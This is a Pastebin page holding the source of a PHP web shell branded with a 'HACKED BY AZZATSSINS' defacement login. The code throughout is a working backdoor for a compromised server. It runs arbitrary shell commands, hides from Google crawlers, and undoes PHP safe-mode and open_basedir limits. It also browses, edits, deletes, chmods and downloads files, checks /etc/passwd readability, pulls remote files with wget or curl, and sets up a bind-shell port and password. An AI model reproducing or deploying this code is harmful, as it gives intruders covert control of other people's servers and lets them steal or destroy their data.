Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @define('SELF_PATH', __FILE__);
- $auth_pass = "4d9234336ed8b445f892fc40601d2fad";
- $cookie_hour_expire = 24;
- if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- function printLogin() { ?>
- <meta content=HACKED-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
- <title>AZZATSSIN'S CYBERSERKER'S</title>
- <center>
- <h1><i>~# KILLED BY AZZATSSIN'S #~</i></h1>
- <br /><table><border><nobr><img src=https://scontent-iad3-1.xx.fbcdn.net/hphotos-xfa1/t31.0-8/11741021_1583605078555010_3385696737335881837_o.jpg><br /><br /><font color=violet>~</font><font color=lime>*</font><font color=red>What I want is not peace, but the advantages and beliefs</font><font color=lime>*</font><font color=violet>~</font></center><br>
- <form method=post>
- <address><input type=password name=x><input type=submit value=''></center></address>
- </form></body></html>
- <?php
- exit;
- }
- $cookie_value = md5($_SERVER['HTTP_HOST']."dm".$auth_pass);
- if(isset($_POST['x'])){
- if(md5($_POST['x']) != $auth_pass){
- printLogin();
- }else{
- setcookie("dm", $cookie_value, time()+(60*(60*$cookie_hour_expire)));
- }
- }
- elseif(isset($_COOKIE['dm'])){
- if($_COOKIE['dm'] != $cookie_value){
- printLogin();
- }
- }elseif(!isset($_COOKIE['dm'])){
- printLogin();
- }
- if(isset($_POST['logout'])){
- setcookie("dm", "", time()-(60*(60*60*360000)));
- $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
- echo '<center><span class="b1"> Please Wait ...</scan></center>';
- ?>
- <script>window.location.href = '<?php print $page; ?>';</script>
- <?php exit(0);
- }
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_restore("safe_mode");
- @ignore_user_abort(FALSE);
- @ini_restore("open_basedir");
- @set_magic_quotes_runtime(0);
- @ini_restore("allow_url_fopen");
- @ini_set('max_execution_time',0);
- @ini_restore("disable_functions");
- @ini_restore("safe_mode_exec_dir");
- @ini_restore("safe_mode_include_dir");
- @ini_set('zlib.output_compression','Off');
- date_default_timezone_set('Etc/GMT');
- if(get_magic_quotes_gpc()){
- function stripslashes_array($array)
- { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
- $_POST = stripslashes_array($_POST);
- }
- $quotes = get_magic_quotes_gpc();
- if ($quotes == "1" or $quotes == "on")
- { $quot = "<font style='color:yellow'>ON</font>";}
- else
- { $quot = "<font style='color:#444444'>OFF</font>"; }
- $disablefunc = @ini_get("disable_functions");
- function showdisablefunctions() {
- if ($disablefunc=@ini_get("disable_functions"))
- { return "<span style='color:yellow'>".$disablefunc."</span>"; }
- else
- { return "<span style='color:#444444'>NONE</span>"; }
- }
- function ex($cfe) {
- $res = '';
- if (!empty($cfe)) {
- if(function_exists('exec')) {
- @exec($cfe,$res);
- $res = join("\n",$res);
- }
- elseif(function_exists('shell_exec')) {
- $res = @shell_exec($cfe);
- }
- elseif(function_exists('system')) {
- @ob_start();
- @system($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- }
- elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- }
- elseif(@is_resource($f = @popen($cfe,"r"))) {
- $res = "";
- while(!@feof($f)) { $res .= @fread($f,1024); }
- @pclose($f);
- } else { $res = "Ex() Disabled!"; }
- }
- return $res;
- }
- function delete_option($file){
- if(!$win){
- @exe("rm -rf ".$file);
- if(file_exists($file) && is_file($file)){unlink($file);}
- elseif(file_exists($file) && is_dir($file)){rmdir($file);}
- }
- elseif($win){
- if(is_dir($file)){
- @exe("rd /s /q ".$file);
- if(file_exists($file)){rmdir($file);}
- }
- else {
- @exe("del /q /f ".$file);
- exe("rd /s /q ".$file);
- if(file_exists($file)){
- unlink($file);
- }
- }
- }
- }
- if(isset($_POST['rename'])){
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- @rename($pwd.$old,$pwd.$new);
- $file = $pwd.$new;
- }
- if(isset($_POST['chmod'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;
- }
- if(isset($_POST['chmod_folder'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;
- }
- function showstat($stat) {
- if ($stat=="on")
- { return "<b><font style='color:yellow'>ON</font></b>"; }
- else
- { return "<b><font style='color:#444444'>OFF</font></b>"; }
- }
- function testperl() {
- if (ex('perl -h'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testfetch() {
- if(ex('fetch --help'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testwget() {
- if (ex('wget --help'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testoracle() {
- if (function_exists('ocilogon'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testpostgresql() {
- if (function_exists('pg_connect'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testmssql() {
- if (function_exists('mssql_connect'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testcurl() {
- if (function_exists('curl_version'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- function testmysql() {
- if (function_exists('mysql_connect'))
- { return showstat("on"); }
- else
- { return showstat("off"); }
- }
- if(isset($_GET['dl']) && ($_GET['dl'] != "")){
- $file = $_GET['dl'];
- $filez = @file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file)."\";");
- echo $filez;
- exit;
- }
- elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
- $file = $_GET['dlgzip'];
- $filez = gzencode(@file_get_contents($file));
- header("Content-Type:application/x-gzip\n");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
- echo $filez;
- exit;
- }
- if(isset($_GET['img'])){
- @ob_clean();
- $d = isset($_GET['img'])? $_GET['img']:"";
- $f = $_GET['img'];
- $inf = @getimagesize($d.$f);
- $ext = explode($f,".");
- $ext = $ext[count($ext)-1];
- @header("Content-type: ".$inf["mime"]);
- @header("Cache-control: public");
- @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- @header("Cache-control: max-age=".(60*60*24*7));
- @readfile($d.$f);
- die();
- }
- $software = getenv("SERVER_SOFTWARE");
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
- $system = @php_uname();
- if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE;
- if(isset($_GET['dm'])){
- if(@is_dir($_GET['view'])){
- $pwd = $_GET['view'];
- @chdir($pwd);
- }
- else{
- $pwd = $_GET['dm'];
- @chdir($pwd);
- }
- }
- if(!$win){
- if(!$user = rapih(exe("whoami"))) $user = "";
- if(!$id = rapih(exe("id"))) $id = "";
- $prompt = $user." \$] ";
- $pwd = @getcwd().DIRECTORY_SEPARATOR;
- }
- else {
- $user = @get_current_user();
- $id = $user;
- $prompt = $user." >";
- $pwd = realpath(".")."\\";
- $v = explode("\\",$d);
- $v = $v[0];
- foreach (range("A","Z") as $letter) {
- $bool = @is_dir($letter.":\\");
- if ($bool) {
- $letters .= "<a href=\"?dm=".$letter.":\\\"><span class=\"infodmx\">[ ";
- if ($letter.":" != $v)
- { $letters .= $letter; }
- else
- { $letters .= "<span style=\"color:#444444\"/>".$letter."</span>";}
- $letters .= " ]</span> </a>";
- }
- }
- }
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;
- $bytes = disk_free_space(".");
- $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $base = 1024;
- $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
- $totalspace_bytes = disk_total_space(".");
- $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $totalspace_bases = 1024;
- $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
- $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
- $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- $my_ip = $_SERVER['REMOTE_ADDR'];
- $server_admin=$_SERVER['SERVER_ADMIN'];
- $gat = $_SERVER['GATEWAY_INTERFACE'];
- $pro = $_SERVER['SERVER_PROTOCOL'];
- $readdr = $_SERVER['REMOTE_ADDR'];
- $uagent = $_SERVER['HTTP_USER_AGENT'];
- $xforwarded = $_SERVER['HTTP_X_FORWARDED_FOR'];
- $signature = $_SERVER['SERVER_SIGNATURE'];
- $serport = $_SERVER['SERVER_PORT'];
- $remport = $_SERVER['REMOTE_PORT'];
- $bindport = "13123";
- $bindport_pass = "b374k";
- $etc_passwd=@is_readable("/etc/passwd")?"<b><span style=\"color:#444444\"/>ON</span></b>":"<b><span style=\"color:yellow\"/>DISABLE</span></b>";
- $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
- $pwdurl = "";
- for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
- $pathz = "";
- for($j = 0 ; $j <= $i ; $j++)
- { $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; }
- $pwdurl .= "<a href=\"?dm=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
- }
- $buff .= "<nobr><b><span class=\"dminfox\">Software</span> : <span style=\"color:#444444\"/>" . $software . "</span></b></nobr><br/>";
- $buff .= "<nobr><b><span class=\"dminfox\">System</span> : <span style=\"color:#444444\"/>".$system."</span></b></nobr><br />";
- $buff .= "<nobr><b><span class=\"dminfox\">Webmaster</span> : "."<b><span style='color:#444444'>$server_admin</span></b>"." <b><span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Date : <b><span style=\"color:#444444\"/>".date("d M Y H:i:s",time())."</b><br/>";
- if($id != "")
- $buff .= "<nobr><span class=\"dminfox\">User</span> : <b><span style=\"color:#444444\"/>" . $id . "</span></b><nobr><br />";
- $buff .= "<nobr><span class=\"dminfox\">Server IP</span> : <b><span style=\"color:#444444\"/>".$server_ip."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Server Port</span> : <b><span style=\"color:#444444\"/>".$serport."</span></b></nobr><br/>";
- $buff .= "<nobr><span class=\"dminfox\">Your IP</span> : <b><span style=\"color:#444444\"/>".$my_ip."</span>
- <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Real IP</span> : <b><span style=\"color:#444444\"/>".$xforwarded."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Remote Port</span> : <b><span style=\"color:#444444\"/>".$remport."</span> </b></nobr><br/>";
- $buff .= "<nobr><span class=\"dminfox\">Total HDD</span> : "."<b><span style='color:#444444'>$totalspace_show</span>"." <b><span class=\"infodmx\">||</span></b> "."<span class=\"depan\">Free HDD</span> : "."<b><span style='color:#444444'>$freespace_show</span>"."</b></nobr><br/>";
- $buff .= "<nobr><span class=\"dminfox\">PHP ver</span> : <b><span style='color:#444444'>".phpversion()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">Gateway</span> : <b><span style='color:#444444'>".$gat."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Protocol</span> : <b><span style='color:#444444'>".$pro."</span></b></nobr><br/>";
- if($safemode)
- $buff .= "<nobr><span class=\"dminfox\">Safemode</span> : <b><span style=\"color:yellow\">ON</span> [ <a href='?dm=$pwd&x=safemodeoff'>BYPASS</a> ]</b><br />";
- else $buff .= "<nobr><span class=\"dminfox\">Safemode</span> : <b><span style=\"color:#444444\">OFF</span> <span class=\"infodmx\">||</span></b> <span class=\"depan\">Magic Quotes</span> : <b><span style=\"color:#444444\"/>".$quot."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Read /etc/passwd</span> : "."<span style='color:#444444'>$etc_passwd</span>"."<br />";
- $buff .= "<nobr><span class=\"dminfox\">MySQL</span> : <b><span style=\"color:#444444\"/>".testmysql()." <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">MSSQL :</span><b> <span style=\"color:#444444\"/>".testmssql()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">Oracle :</span><b> <span style=\"color:#444444\"/>".testoracle()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">PostgreSQL :</span><b> <span style=\"color:#444444\"/>".testpostgresql()."</span></b> </nobr><br/>";
- $buff .= "<nobr><span class=\"dminfox\">Curl</span> : <b><span style=\"color:#444444\"/>".testcurl()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">WGet</span> : <b><span style=\"color:#444444\"/>".testwget()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">Fetch</span> : <b><span style=\"color:#444444\"/>".testfetch()."</span> <span class=\"infodmx\">||</span></b>
- <span class=\"dminfox\">Perl</span> : <b><span style=\"color:#444444\"/>".testperl()."</span></b></nobr><br/>";
- $buff .= "<span class=\"dminfox\">Disabled Functions</span> : <span style=\"color:#444444\">".showdisablefunctions()."<br />";
- $buff .= $letters."<span class=\"dminfox\">Directory : ".$pwdurl."</span><br /><br />";
- function rapih($text){
- return trim(str_replace("<br />","",$text));
- }
- function magicboom($text) {
- if(!get_magic_quotes_gpc())
- {
- return $text;
- }
- return stripslashes($text);
- }
- function showdir($pwd,$prompt){
- $fname = array();
- $dname = array();
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
- else $posix = FALSE;
- $user = "????:????";
- if($dh = opendir($pwd)){
- while($file = readdir($dh)){
- if(is_dir($file))
- { $dname[] = $file; }
- elseif(is_file($file))
- { $fname[] = $file; }
- }
- closedir($dh);
- }
- sort($fname);
- sort($dname);
- $path = @explode(DIRECTORY_SEPARATOR,$pwd);
- $tree = @sizeof($path);
- $parent = "";
- // Membuat 2 Form Input CMD n DIRectory Di Main Page //
- $buff = "<form action=\"?dm=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
- <table class=\"cmdbox\" style=\"width:50%;\">
- <tr>
- <td><nobr><b>CMD</b></nobr></td>
- <td><!-- onMouseOver=\"this.focus();\" --><nobr><input id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:300px;\" value=\"\" />
- <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" />
- </nobr>
- </form>
- </td>
- </tr>
- <tr>
- <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <td><nobr><b>DIR</b></nobr></td>
- <td><nobr><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:300px;\" value=\"".$pwd."\" /> <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" /></nobr></form>
- </td>
- </tr>
- </table>
- <p><table class=\"explore\"><tr>
- <th style=\"width:200px;\"><strong><span class='b3'>_NAME_</span></strong></th>
- <th style=\"width:70px;\"><strong><span class='b3'>_DIR / SIZE_</span></strong></th>
- <th style=\"width:70px;\"><strong><span class='b3'>_CHMOD_</span></strong></th>
- <th style=\"width:150px;\"><strong><span class='b3'>_OWNER : GROUP_</span></strong></th>
- <th style=\"width:140px;\"><strong><span class='b3'>_LAST ACCESS_</span></strong></th>
- <th style=\"width:150px;\"><strong><span class='b3'>_ACTION_</span></strong></th></tr>";
- if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
- else $parent = $pwd;
- foreach($dname as $folder){
- if($folder == ".") {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; }
- else {
- $owner = $user;
- }
- $buff .= "<tr>
- <td><a href=\"?dm=".$pwd."\"><img src='data:image/png;base64,R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWSkrqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/jVwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs='>$folder</a></td>
- <td align=center>-</td>
- <td align=center>".substr(sprintf('%o', fileperms($pwd)), -4)."</td>
- <td align=center>".$owner."</td>
- <td align=center>".date("d-M-Y H:i",@fileatime($pwd))."</td>
- <td align=center><span id=\"titik1\">
- <a href=\"?dm=$pwd&edit=".$pwd."new.php\">[ +FILE ] </a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik1','titik1_form');\"> [ +FOLDER ]</a></span>
- <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form>
- </td></tr>";
- }
- elseif($folder == "..") {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td><a href=\"?dm=".$parent."\"><img src='data:image/png;base64,R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqtWg0JADs='/>$folder</a></td>
- <td align=center>-</td>
- <td align=center>".substr(sprintf('%o', fileperms($parent)), -4)."</td>
- <td align=center>".$owner."</td>
- <td align=center>".date("d-M-Y H:i",@fileatime($parent))."</td>
- <td align=center><span id=\"titik2\"><a href=\"?dm=$pwd&edit=".$parent."new.php\">[+FILE ] </a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik2','titik2_form');\"> [ +FOLDER ]</a></span>
- <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form>
- </td>
- </tr>";
- } else {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td>
- <a id=\"".clearspace($folder)."_link\" href=\"?dm=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,
- R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///
- nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='/> $folder </a>
- <form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
- </form>
- </td>
- <td align=center>FOLDER</td>
- <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">
- ".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."</a>
- <form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></td>
- <td align=center>".$owner."</td>
- <td align=center>".date("d-M-Y H:i",@fileatime($folder))."</td>
- <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">[ REN ] </a><span class=\"infodmx\">||</span><a href=\"?dm=$pwd&fdelete=".$pwd.$folder."\"> [ DEL ]</a>
- </td></tr>";
- }
- }
- foreach($fname as $file){
- $full = $pwd.$file;
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($file));
- $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else {
- $owner = $user;
- }
- $buff .= "<tr>
- <td><a id=\"".clearspace($file)."_link\" href=\"?dm=$pwd&view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' /> $file</a><form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
- </form></td>
- <td align=center>".ukuran($full)."</td>
- <td align=center><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o', fileperms($full)), -4)."</a><form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
- </form></center></td>
- <td align=center>".$owner."</td>
- <td align=center>".date("d-M-Y H:i",@fileatime($full))."</td>
- <td align=center><a href=\"?dm=$pwd&edit=$full\">[E]</a>
- <span class=\"infodmx\">||</span>
- <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">[R]</a>
- <span class=\"infodmx\">||</span>
- <a href=\"?dm=$pwd&delete=$full\">[X]</a>
- <span class=\"infodmx\">||</span>
- <a href=\"?dm=$pwd&dl=$full\">[D]</a>
- </td></tr>";
- }
- $buff .= "</table></p>";
- return $buff;
- }
- // Fungsi Ukuran Besar Jenis File
- function ukuran($file){
- if($size = @filesize($file)){
- if($size <= 1024) {
- return "$size B";
- } else {
- if($size <= 1024*1024) {
- $size = @round($size / 1024,2);;
- return "$size KB";
- } else {
- $size = @round($size / 1024 / 1024,2);
- return "$size MB";
- }
- }
- }
- else return "???";
- }
- function exe($cmd){
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result){
- $buff .= $result;
- }
- return $buff;
- }
- elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('shell_exec')){
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- // Fungsi Tulis NewFile //
- function tulis($file,$text){
- $textz = gzinflate(base64_decode($text));
- if($filez = @fopen($file,"w")) {
- @fputs($filez,$textz);
- @fclose($file);
- }
- }
- // Fungsi Upload Dari Url //
- function ambil($link,$file) {
- if($fp = @fopen($link,"r")){
- while(!feof($fp)) {
- $cont.= @fread($fp,1024);
- }
- @fclose($fp);
- $fp2 = @fopen($file,"w");
- @fwrite($fp2,$cont);
- @fclose($fp2);
- }
- }
- function which($pr){
- $path = exe("which $pr");
- if(!empty($path)) {
- return trim($path);
- } else {
- return trim($pr);
- }
- }
- function download($cmd,$url){
- $namafile = basename($url);
- switch($cmd) {
- case 'wwget':
- exe(which('wget')." ".$url." -O ".$namafile);
- break;
- case 'wlynx':
- exe(which('lynx')." -source ".$url." >".$namafile);
- break;
- case 'wfread' :
- ambil($wurl,$namafile);
- break;
- case 'wfetch' :
- exe(which('fetch')." -o ".$namafile." -p ".$url);
- break;
- case 'wlinks' :
- exe(which('links')." -source ".$url." >".$namafile);
- break;
- case 'wget' :
- exe(which('GET')." ".$url." >".$namafile);
- break;
- case 'wcurl' :
- exe(which('curl')." ".$url." -o ".$namafile);
- break;
- default:
- break;
- }
- return $namafile;
- }
- // Fungsi array utk CHMOD / permission //
- function get_perms($file) {
- if($mode=@fileperms($file)){
- $perms='';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- else return "?????";
- }
- function clearspace($text){
- return str_replace(" ","_",$text);
- }
- // Fungsi NetSploit //
